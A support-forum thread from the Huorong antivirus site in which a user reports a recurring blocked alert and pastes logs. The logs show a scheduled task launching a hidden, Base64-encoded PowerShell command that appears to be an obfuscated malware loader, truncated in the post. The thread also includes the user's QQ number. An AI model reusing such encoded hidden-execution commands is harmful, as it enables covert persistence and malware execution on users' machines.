火绒安全软件

标题: cmd.exe触犯敏感动作防护规则 [打印本页]

作者: huoronghr2023 时间: 2023-1-6 17:22
标题: cmd.exe触犯敏感动作防护规则
每过半小时就跳出来一次，强行打断我的全屏应用。全盘查杀过病毒了没发现什么问题，请问是什么情况，如何解决？

防护项目：隐藏执行PowerShell
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTAHQAcgAuAEcAZQB0AEIAeQB0AGUAcwA
操作结果：已阻止

进程ID：7296
操作进程：C:\Windows\System32\cmd.exe
操作进程命令行：C:\Windows\system32\cmd.EXE /c powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTA
父进程ID：2328
父进程：C:\Windows\System32\svchost.exe
父进程命令行：C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

防护项目：隐藏执行PowerShell
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTAHQAcgAuAEcAZQB0AEIAeQB0AGUAcwA
操作结果：已阻止

进程ID：7296
操作进程：C:\Windows\System32\cmd.exe
操作进程命令行：C:\Windows\system32\cmd.EXE /c powershell -WindowStyle Hidden -E "CgAKACQAQQBzAGMAXwBFAG4AYwBTAHQAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQA7AAoAJABSAFYAXwBsAGQAIAA9ACAAIgAyADcAIgA7AAoACgAKACQAbgBqAF8AdgBhAHIAMQA9ACQAbgB1AGwAbAA7AAoAJAB2ADIAXwBQAFIATQAgAD0AIAAiAFcAeQBJADUATQBUAGcAMwBOAFQAawB3AE0AVABRAHcATQBqAGsAMwBNAHoAWQB5AE0ARABVADAASQBpAHcAeABOAGoAWQAyAE4ARABjADQATQBEAGMAdwBMAEMASgBOAFYARgBrAHkAVABrAFIAUgBTAFUASgAzAE4ARQBSAEIAVQBXAGQASABRAG4AZABCAFIAVQBGADMATwBFAEoAQwBkADAAbABFAFEAbQBkAE4AUQBWAE4AQgBaADAARgBDAGQAMQBWAE4AUQBtAHQAdgBTAEUARgBuAFMAVQBoAEIAWgAwAFYATgBRAGsARgBCAFEAVgBOAG4ASgBUAE4ARQBKAFQATgBFAEkAbAAwAD0AIgA7AAoAJABvAGsAPQAkAHQAcgB1AGUACgAKAGYAdQBuAGMAdABpAG8AbgAgAHYAYQBsAHUAZQBGAHIAbwBtAEkAdABlAG0ASQBuAGQAeAAoAFsAcwB0AHIAaQBuAGcAXQAkAGEAcgByAF8AYgB0AHMAMgApACAAewAKAAkAJABhAHIAcgBfAGIAdABzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYQByAHIAXwBiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAQQBzAGMAXwBFAG4AYwBTA
父进程ID：2328
父进程：C:\Windows\System32\svchost.exe
父进程命令行：C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

作者: 火绒运营专员 时间: 2023-1-6 17:26
您好这边确认下再给您答复~

作者: huoronghr2023 时间: 2023-1-7 01:38

火绒运营专员发表于 2023-1-6 17:26
您好这边确认下再给您答复~

好的谢谢

作者: huoronghr2023 时间: 2023-1-7 18:24

火绒运营专员发表于 2023-1-6 17:26
您好这边确认下再给您答复~

你好请问还需要多久呢

作者: huoronghr2023 时间: 2023-1-9 17:42

火绒运营专员发表于 2023-1-6 17:26
您好这边确认下再给您答复~

还记得我吗hello hello

作者: 火绒运营专员 时间: 2023-1-9 17:45

huoronghr2023 发表于 2023-1-9 17:42
还记得我吗hello hello

您好，您可以留下qq，这边详细给您看下问题~

作者: huoronghr2023 时间: 2023-1-9 20:08

火绒运营专员发表于 2023-1-9 17:45
您好，您可以留下qq，这边详细给您看下问题~

1410040868

作者: 火绒运营专员 时间: 2023-1-9 20:12

huoronghr2023 发表于 2023-1-9 20:08
1410040868

好的，我们会在明日尽快添加一下您的QQ，麻烦您留意一下验证信息谢谢

欢迎光临火绒安全软件 (https://bbs.huorong.cn/)